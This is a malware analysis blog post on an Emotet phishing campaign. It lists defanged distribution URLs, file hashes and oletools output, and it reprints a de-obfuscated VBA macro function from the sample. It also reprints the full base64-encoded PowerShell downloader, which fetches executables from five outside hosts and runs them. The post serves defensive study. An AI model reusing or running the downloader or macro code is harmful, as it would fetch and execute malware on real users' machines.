Persianov on Security
[Posts] [Projects] [Bugtrack] [Crackmes] [Tutorials]

[ Emotet malware analysis. Part 1. ]

This is Part 1 of Emotet malware analysis I’m planning to post. It covers phases 1 and 2 of the attack, specifically phishing and establishing persistence in the infected system. Emotet is spread via phishing emails containing malicious links or attachments, and targets everyone (individuals, companies and governments).

Phase 1. Malicious email and document.

First phase of the attack starts with a Phishing email. Usually subject, layout, attachments and links are modified periodically by attackers. In this article I’m going to analyze this sample from VirusTotal.

VirusTotal Sample

One of Emotet’s characteristics is constantly changing content of the phishing emails. Usually these contain a malicious link or attachment. This article covers the sample which was spread using via following links:

URL
hxxps://www.tenderheartfoundation.org/knqimf/muwcu-xh8fa-vnewt/
hxxp://clyckmedia.com/clientes/ylhq8-zg1ue-iibdnyco/
hxxp://noithathopehome.com/8brl9if/hldd-m2v2fy-xavkpbbl/
hxxp://cllcanada.ca/2010/lmef-jmlr1n-ftkktgp/
hxxp://www.smilefy.com/it3fqqo/rnk6-9mm14-fcnp.view/
hxxp://cadsupportplus.com/assets/nwi2z-20bew-ffuwbfmt/
hxxp://www.sdhjesov.cz/wordpress/papcc-koe6n-lsric.view/
hxxp://bigkidneys.com/42QQXOURJ/gf1lm-hmr0c-lnkcfak/
hxxp://compraventachocados.cl/css/hgkhx-lin1b-zjkebwycv/
hxxp://cruelacid.com/icon/bmza-8dlyf-jemlc/
hxxp://ecommercedefinitivo.com.br/cursos/ryyjt-tnxm7-byxukc/
hxxp://annual.fph.tu.ac.th/wp-content/uploads/ikvv-lt7rlt-bqcnmly/
hxxp://dbtools.com.br/mailer/ezsvr-mqo7i-zgysfrmwr/
hxxp://demu.hu/wp-content/2h2z2-errsh-sxwqgscp/
hxxp://georgekiser.com/test/z6uwt-r0459s-rqkv.view/
hxxp://wdl.usc.edu/wp-includes/zvlp-s69lox-wrkbb.view/
hxxp://dictionary.me/js/bbrj3-tq4eh-izxcuhnb/
hxxp://duncaninstallation.com/images/u32g-mdxys3-gjcwkz/
hxxp://devpro.ro/misc/3wa1-zykhgf-xcjqnfs/

All URLs above, once accessed, drop a Microsoft Office Document with macros in it.

Checksum File type File Size
f5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c MS Word Document 246KB (251904 bytes)

Analysis.

Based on the result we get by running file command against this sample, it looks like this document has 1 page and doesn’t contain any words.

f5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c: Composite Document File V2 Document, Little Endian, 
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, 
Create Time/Date: Mon Mar 11 21:32:00 2019, Last Saved Time/Date: Mon Mar 11 21:32:00 2019, Number of Pages: 1, 
Number of Words: 0, Number of Characters: 5, Security: 0

Using Oletools to get the list of document’s objects, 3 macros elements have been found:

  7:        74 'Macros/PROJECTwm'
  8: M   70540 'Macros/VBA/S1ADDQ1A'
  9: M   14650 'Macros/VBA/YBB1wA'
 10:     49987 'Macros/VBA/_VBA_PROJECT'
 11:      1344 'Macros/VBA/__SRP_0'
 12:       110 'Macros/VBA/__SRP_1'
 13:       436 'Macros/VBA/__SRP_2'
 14:       187 'Macros/VBA/__SRP_3'
 15:       601 'Macros/VBA/dir'
 16: M    9719 'Macros/VBA/mA4QAX4'
 17:      4096 'WordDocument'

Extraction.

Objects 8, 9 and 16 contain Visual Basic code, thus of higher interest for further analysis.

Object Name Checksum Size
8 S1ADDQ1A 34ffc69ff37401b965b04fa4f3c1fbcdffab11fd2e34f9e17a8347b70922398b 44KB (44096 bytes)
9 YBB1wA d51c137e3f591a275628e697d2fbb305cc3c630455480508184b45753608d973 8.8KB (8956 bytes)
16 mA4QAX4 d2e56d56ced7ed8de5f701a873086c8134e1311dd574a607a45023f38d5ecaf7 5.6KB (5671 bytes)

Out of all extracted parts of the script, mA4QAX4 is the entry point and starts the execution once the document is opened. Whole VBS code is obfuscated, as seen in the image below.

Macros Entry Point

All three parts are dependent on each other and have to be merged, for further analysis. You can find it HERE.

The call chain looks like this:

  1. autoopen();
  2. iQwUcAAU(param):
    • Creates Win32_ProcessStartup class;
    • Creates an object of the class by calling Create method;
    • Passes param string as command argument, thus starting the execution;

Value of param consists of concatenated results of following functions: SQoBUAA, vDXBUQ, rDCAQQcA, pAADAADD, k1kGUAB, cAABQDw. All these functions are similar in terms of logic and were easy to de-obfuscate. Below is the clean version of SQoBUAA:

Function SQoBUAA()
On Error Resume Next
jkQBUx = "l -" + "nop" + " -e" + "n" + "c" + " JA" + "BHA" + "G" + "8Aa" + "wB" + "HA" + "E" + "M" + "AN" + "A" + "B" + "B" + "A" + "D" + "QA" + "PQ" + "A" + "oAC"
lBADQoU = "cAe" + "gBf" + "AC" + "cAK" + "w" + "An" + "AEE" + "AWg" + "AnA" + "CsA" + "Jw" + "Br" + "A" + "G8A" + "RAB"
tcoAAAAQ = "B" + "ACc" + "A" + "K" + "Q" + "A7A" + "CQ" + "AU" + "gBf" + "AEE" + "A" + "a" + "w" + "AxA" + "F8"
HAQUxA_ = "AQQ" + "BBA" + "D0" + "Abg" + "BlA" + "Hc" + "ALQ" + "BvA" + "GI" + "Aa" + "gBl" + "AG" + "MAd" + "A" + "AgA" + "E" + "4" + "A" + "Z" + "QB0" + "A" + "C" + "4A" + "VwB" + "lAG"
tUQokAA = "IA" + "Qw" + "Bs" + "AGk" + "AZQ" + "Bu" + "AH" + "Q" + "A" + "O" + "wA" + "kAG" + "k" + "AVQ" + "Bv" + "AF" + "8AR" + "ABB" + "AD" + "0" + "AK" + "AA" + "n" + "A" + "GgA"
cUAAoX = "d" + "AAn" + "ACs" + "AJw" + "B0" + "AH" + "A" + "AOg" + "A" + "vA" + "C8A" + "Yg" + "B" + "pA" + "G" + "U" + "A" + "ZAB" + "l" + "A" + "H" + "I" + "A" + "bQ" + "Bh"
AkQG_A = "A" + "Cc" + "AKw" + "An" + "AG" + "4AL" + "g" + "B" + "uAG" + "UAd" + "AA" + "vAG" + "wA" + "ZQB" + "zAG" + "wA" + "a" + "QBl"
SQoBUAA = jkQBUx + lBADQoU + tcoAAAAQ + HAQUxA_ + tUQokAA + cUAAoX + AkQG_A
End Function

Phase 2. Persistent Powershell.

A base64 encoded powershell script is extracted and set to run at system’s startup, by the document macros.

powershell -nop -enc JABHAG8AawBHAEMANABBADQAPQAoACcAegBfACcAKwAnAEEAWgAnACsAJwBrAG8ARABBACcA
KQA7ACQAUgBfAEEAawAxAF8AQQBBAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAVQBvAF8ARABBAD0AKAA
nAGgAdAAnACsAJwB0AHAAOgAvAC8AYgBpAGUAZABlAHIAbQBhACcAKwAnAG4ALgBuAGUAdAAvAGwAZQBzAGwAaQBlAC8AbAAnACsAJwBMAC8AJwArACcAQABoAH
QAdABwADoALwAnACsAJwAvAG4AaQBzAHMAYQAnACsAJwBuAGIAYQAnACsAJwBjAGcAaQBhACcAKwAnAG4AZwAnACsAJwAuAGMAJwArACcAbwBtAC8AdwBwAC0AY
wBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAHgAUgAnACsAJwAzAC8AJwArACcAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGUAcQB1AGkAZABh
AGQAZABlAGcAZQBuAGUAcgAnACsAJwBvAC4AJwArACcAaQB6AHQAJwArACcAYQBjAGEAbABhAC4AdQAnACsAJwBuAGEAbQAuAG0AeAAvACcAKwAnAHcAcAAtAGE
AZABtAGkAbgAvACcAKwAnAFgAUABGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AJwArACcAegAnACsAJwBlAHMAdABlAHYAZQBuAHQAJwArACcAcwAuAGMAbw
AvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAdQBkAGUAcwAvAEcAJwArACcASgBBACcAKwAnAG8ALwBAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwB0A
HkAJwArACcAbABpACcAKwAnAHMAaABsAGEAYgAuAHcAZQBiAHAAaQB4AGEAYgB5AHQAJwArACcAZQAnACsAJwAuAGMAJwArACcAbwBtAC8AdAAnACsAJwBoAGoA
bwB3AHIAawA1ACcAKwAnAGUALwA5AFUARwAvACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHYAWgBBAEEAQgA0AD0AKAAnAFEAQwBBAEIAJwArACcAQgB
BAFUAJwApADsAJABKAFUAQQBrAEEAQQAgAD0AIAAoACcANAA4ACcAKwAnADYAJwApADsAJABGAGsAWgBBAEQAWgBVAD0AKAAnAGoAJwArACcANABfAEEAQQBCAE
EAJwApADsAJABtAFEAVQBrAHcARwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBVAEEAawBBAEEAKwAoACcALgBlACcAK
wAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAEIAQQBCAEQAbwAgAGkAbgAgACQAaQBVAG8AXwBEAEEAKQB7AHQAcgB5AHsAJABSAF8AQQBrADEAXwBB
AEEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcgBCAEEAQgBEAG8ALAAgACQAbQBRAFUAawB3AEcAKQA7ACQAQwBYAGsAQQBBADQAQQA9ACgAJwBWADQ
AQgBBACcAKwAnAEEAawBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAG0AUQBVAGsAdwBHACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANA
AwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbQBRAFUAawB3AEcAOwAkAG4ARABBAEEAdwBvAFgAPQAoACcAcwAnACsAJwBvAEEAeABBA
EQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAdwBRAEEAQQBRAHgAPQAoACcARQBCAG8AYwAnACsAJwBBAEEAJwApADsA

Once decoded, several URLs pop up which drop phase 3 PE files.

Decoded powershell

Totally there are 5 different websites, hosting Emotet malware.

URL Dropped PE Checksum Size
hxxp://biederman.net/leslie/lL/ e76900b9b50306564c415423e0eb28463722b0427186134ba301209b4ed2f440 180KB (183560 bytes)
hxxp://nissanbacgiang.com/wp-content/xR3/ 5c2fbc0eaae6ccc8342c22325f0aca1e989beec8d578e3fe57722b807a46c773 180KB (183560 bytes)
hxxp://equidaddegenero.iztacala.unam.mx/wp-admin/XPF/ bc0d53d74f3f4ef286b4f4caeb8d8b77e32cc17b808dd0de5674842ad713dd72 180KB (183560 bytes)
hxxp://stylishlab.webpixabyte.com/thjowrk5e/9UG/ 1c06da405051cfc9f68dbb404e338abb90a38db29f86f17e01487ac2c921c05d 251KB (256264 bytes)
hxxp://www.zestevents.co/wp-includes/GJAo/ 403 HTTP Error N/A

Conclusion.

Looks like the group behind Emotet, haven’t focused on heavily obfuscating phase 1 and 2 scripts. Analysis of downloaded samples to follow in Part 2 of this article.